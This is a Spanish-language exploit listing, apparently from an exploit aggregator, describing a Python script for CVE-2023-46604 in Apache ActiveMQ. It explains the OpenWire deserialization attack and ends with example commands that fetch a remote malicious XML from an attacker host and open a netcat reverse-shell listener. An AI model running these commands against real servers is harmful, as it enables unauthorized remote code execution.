## https://sploitus.com/exploit?id=3D224FBD-135B-51B6-BDF7-5668CE8DECF7
Resumen T茅cnico del Ataque: CVE-2023-46604
El script explota una vulnerabilidad de deserializaci贸n insegura en Apache ActiveMQ (CVE-2023-46604) para lograr la ejecuci贸n remota de c贸digo en el servidor objetivo.
Descripci贸n del Proceso de Explotaci贸n
Objetivo de la Vulnerabilidad:
La vulnerabilidad reside en el protocolo OpenWire de Apache ActiveMQ.
Permite la deserializaci贸n insegura de objetos, lo que puede ser aprovechado para ejecutar c贸digo arbitrario en el servidor.
Requisitos Previos:
Acceso de red al servidor ActiveMQ.
Un archivo XML malicioso (poc.xml) disponible a trav茅s de una URL accesible por el servidor objetivo.
Componentes del Ataque:
Script Python: Automatiza el env铆o del payload malicioso al servidor ActiveMQ.
Archivo XML (poc.xml): Contiene un bean de Spring que define la ejecuci贸n de un comando malicioso (por ejemplo, abrir una shell inversa).
Pasos del Ataque
Preparaci贸n del Payload:
El script construye un mensaje en hexadecimal que incluye:
El nombre de la clase Java: org.springframework.context.support.ClassPathXmlApplicationContext.
La URL del archivo XML malicioso.
El payload se convierte en una secuencia de bytes que puede ser enviada a trav茅s del protocolo OpenWire.
Env铆o del Payload:
El script abre una conexi贸n de socket TCP al servidor ActiveMQ en el puerto especificado (por defecto 61616).
Env铆a el payload malicioso al servidor.
Ejecuci贸n del C贸digo Malicioso:
El servidor ActiveMQ deserializa el objeto especificado en el payload.
Debido a la deserializaci贸n insegura, se carga y ejecuta el bean de Spring definido en el archivo XML.
Este bean ejecuta un comando malicioso (por ejemplo, una shell inversa) en el servidor.
_________________________________________________________
ejemplo de ejecucion:
- ***python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml***
- **nc -lvnp 9001**
este script fue copiado y modificado en espa帽ol:https://github.com/evkl1d/CVE-2023-46604.git